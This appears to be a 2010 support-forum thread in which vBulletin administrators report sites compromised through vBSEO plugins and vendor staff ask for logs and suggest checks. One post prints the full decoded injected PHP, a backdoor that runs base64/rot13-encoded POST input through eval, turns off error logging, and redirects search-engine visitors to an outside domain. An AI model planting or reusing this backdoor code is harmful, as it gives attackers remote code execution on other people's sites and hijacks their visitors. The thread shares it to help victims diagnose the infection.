Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0
What should i be doing ? as this re-directing is really hurting my site ?
Should I un-install vbseo and re-install ? or just upgrade to the new version ?
Woc
This is a discussion on Security issue within the Bug Reporting forums, part of the vBSEO SEO Plugin category; Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0 What should i be doing ? as ...
Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0
What should i be doing ? as this re-directing is really hurting my site ?
Should I un-install vbseo and re-install ? or just upgrade to the new version ?
Woc
We have a number of forums hit by the base64 exploit already.
Here's what we have:
All are running current patched versions of vBSEO (3.2 or 3.3.2).
All are running vBSEO Sitemap Generator 1.7 - 2.2. (none current)
A variety of different vB versions vB 3.6.12 through to 3.7.6.
I have an exported product-crawlability_vbseo.xml file that shows the base64 exploit if you need to see it. Let me know and I'll submit a ticket.
Hello,
if you have server logs for the time period when that has happened, please provide details via support ticket.
Oleg Ignatiuk / Crawlability Inc.
vBSEO 3.6.0 GOLD Released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
It's happened to us using vbSEO 3.3.2 and Site Generator 2.5. Our exploit is pointing us to url2short.info.
Disabling and re-enabling vbseo seems to have worked for now.
For anyone interested, this is the full code it outputs (deflated, decoded, depacked, unobfuscated etc)
Essentially allowing them to execute misc code, and redirecting new members to their website :(Code:$key = md5('9h7r'); if (isset($_POST[$key])) { eval(base64_decode(str_rot13($_POST[$key]))); } ini_set('display_errors', 0); ini_set('log_errors', 0); $referer = (!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER')); if (strlen($referer) > 10) { $ip = $_SERVER['REMOTE_ADDR']; $hostname = @gethostbyaddr($ip); if ((strpos($ip, '65.55.') !== 0) && (strpos($hostname, 'msnbot') === false)) { $search_engines = array('search.live.com', 'www.google', 'search.yahoo.com', 'www.bing.com', 'yandex.ru', 'baidu.com'); foreach ($search_engines as $engine) { if ((strpos($referer, $engine) !== false) && (empty($_COOKIE['vbsp']))) { $host = substr(@md5($_SERVER['HTTP_HOST']), 0, 8); die("<html> <head> </head> <body> <script type=\"text/javascript\"> var vbsp = '$host'; function ipbcc(name, value) { var date = new Date(); date['setTime'](date['getTime']() + 86400000); var expires = '; expires=' + date['toGMTString'](); document['cookie'] = name + '=' + value + expires + '; path=/' }; ipbcc('vbsp', '1'); document['location'] = 'http://url2short.info/' + vbsp; </script> </body> </html>"); } } } }
- Twelve-60
Last edited by Twelve-60; 03-10-2010 at 11:11 AM.
Our only other plugin is Inferno vBShout Lite 2.5. We're not up to the latest vb patch level however, so we're installing that now.
Does any effected person use same username + password combinations on different forums ?
Mert Gökçeimam / Crawlability Inc.
vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!
Twitter:@Depkac
Personal Blog : Mert Gökçeimam
Mert Gökçeimam / Crawlability Inc.
vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!
Twitter:@Depkac
Personal Blog : Mert Gökçeimam
Just to double check, check youru usergroups, specifically your admins/mods. Make sure there's no one listed who you don't know.
Brian Cummiskey / Crawlability Inc.
vBSEO 3.6.0 GOLD Released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
Mert Gökçeimam / Crawlability Inc.
vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!
Twitter:@Depkac
Personal Blog : Mert Gökçeimam